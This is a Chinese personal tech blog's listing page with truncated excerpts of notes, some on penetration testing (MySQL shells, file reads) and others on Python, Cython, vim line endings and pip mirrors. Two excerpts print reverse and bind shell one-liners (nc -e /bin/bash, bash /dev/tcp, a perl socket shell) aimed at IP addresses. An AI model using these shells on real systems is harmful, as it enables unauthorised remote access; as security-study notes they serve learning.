2024-12-29 厉飞雨 阅读(315) 评论(0) 赞(12)

前言 === 随便记录一下笔记,方便查询.最近是想到什么就记什么. 渗透测试mysql ========= 关于如何攻击mysql请直接看这篇\>[Mysql数据库渗透及漏洞利用总结](https://xz.aliyun.com/t/1491)写的很全 拿shell ====== 1前提需要知道网站的真实**物理路径** 2查看是否允许导入导出 ...

2024-12-29 厉飞雨 阅读(301) 评论(0) 赞(17)

前言 === 刚刚用windows写了个脚本，拿到kali执行发现的问题（还是太垃圾了） 解决 === 用windows系统打开过的文档会被改为dos格式 dos格式：CR LF unix格式：LF 在vim中用\*\*:set ff**查看格式 用** :set ff=unix**和**:set ff=dos\*\*来改变格式

2024-12-29 厉飞雨 阅读(350) 评论(0) 赞(15)

使用 === 正向shell： nc -lvvp 1988 -e /bin/bash nc 10.1.10.2 1988 //攻击鸡 反向shell： nc -e /bin/bash 152.54.56.4 1988 nc -lvvp 1988 //攻击鸡 注...

2024-12-29 厉飞雨 阅读(263) 评论(0) 赞(14)

说明 === 分享一下各种版本的shell写法 bash版本： bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM...

2024-12-29 厉飞雨 阅读(285) 评论(0) 赞(12)

说明 === 涨姿势的文章日常分享 [通过MySQL LOAD DATA特性来达到任意文件读取](https://xz.aliyun.com/t/3973)

2024-12-28 厉飞雨 阅读(270) 评论(0) 赞(17)

Python代码转换为C代码的时候，将会大大增加框架代码量。 [基础教程 \| Cython 官方文档中文版(gitbooks.io)](https://moonlet.gitbooks.io/cython-document-zh_cn/content/ch1-basic_tutorial.html) 1、正向py-\>c ---------- 先有正向，再有逆向 ...

2024-12-28 厉飞雨 阅读(331) 评论(0) 赞(14)

pythonstock开源股票系统 [pythonstock开源股票系统（1）：概要介绍/说明，使用docker-compose本地运行启动，初始化数据库，可以进行web展示_哔哩哔哩_bilibili](https://www.bilibili.com/video/BV1hg4y1U7ze/?spm_id_from=333.999.0.0&vd_source=afc...

2024-12-28 厉飞雨 阅读(334) 评论(0) 赞(17)

前言 === 今日逛github发现DataCamp 推出的 Python 数据科学速查表的中文版，特来分享。 简直不要太香。 ![干货！Python 数据科学速查表 机器学习大数据分析必备](http://static.51tbox.com/static/2024-12-27/col/50ed6459c5edf5a2a3cfc9c0199cfbba/b8a006bb9e...

2024-12-28 厉飞雨 阅读(241) 评论(0) 赞(17)

前言 === python3编码和python2有所不同,故此记录. 编码解码 ==== from urllib.parse import quote,unquote text = "丽江" print(quote(text,'utf-8')) str = "%E6%95%B0%E6%8D...

2024-12-28 厉飞雨 阅读(298) 评论(0) 赞(14)

前言 === python在使用'pip install '的时候，默认是国外官网地址特别慢，可以手动指定下载的的地址 pip install requests -i https://pypi.tuna.tsinghua.edu.cn/simple